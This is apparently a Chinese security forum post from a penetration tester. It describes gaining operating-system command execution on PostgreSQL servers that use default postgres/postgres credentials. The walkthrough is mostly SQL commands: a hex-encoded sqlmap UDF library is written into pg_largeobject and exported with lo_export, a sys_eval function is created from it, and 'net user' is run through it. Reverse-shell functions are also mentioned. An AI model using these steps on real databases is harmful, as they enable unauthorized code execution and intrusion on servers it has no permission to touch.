Postgresql数据库命令执行

2018-03-30 20:53:09 13 504 1


0x01  postgres简介
      Postgres(以下或简称 pg)在国内并不常见,而在国外的流行程度却不下 mysql。最近在内网做渗透测试的时候兄弟们发现了很多网站是postgresql的数据库,默认口令为postgres postgres。从web段都没有拿到权限,所以研究了一下pg的命令执行。
0x02  pg命令执行
     Pg的命令执行有点类似于mysql的udf提权都是要上传dll文件,其实整个过程都与udf提取相似。
     1.查询oid,oid为当前对象大数据的标识符,我们要利用这个存储UDF文件内容。
     

     2.oid与上面保持一致,等于变相清空”页面”,不要干扰库的生成
     delete from pg_largeobject where loid=1596054;
     3.把16进制的so文件塞进去(根据版本可以在sqlmap下找到so文件大概位置在sqlmap-master\sqlmap-master\udf\postgresql\windows\32)
     insert into pg_largeobject (loid,pageno,data) values(1596054, 0, decode(‘7F454CXXXXXXXXX000’, ‘hex’));
     现将dll文件转化为16进制的编码然后在写入进去,转化为16进制的文件太大,不能一次插入进去所以得分几次。写了一个脚本把它分文4次插入,把生成好的四句insert在命令行中执行。
     

     4. 导出dll
     SELECT lo_export(1596054, 'monkey.dll');
     5. 创建函数
     CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'monkey.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
     6. 命令执行
     select sys_eval('net user');
     

     由于版本是8.2的网上流传的dll都没有反弹shell的函数,9以上的版本都存在反弹shell的函数,以后遇到可以试一试方法基本都差不多,所以只能做到这里。这个命令执行的权限也只是pg的权限,限制还是有点大。
     自评TCV:1
        之前也是在项目上碰到过,在tools也查到了一些资料 ,整合了一下才有此文,不足之处还请见谅。

关于作者

评论13次

要评论?请先  登录  或  注册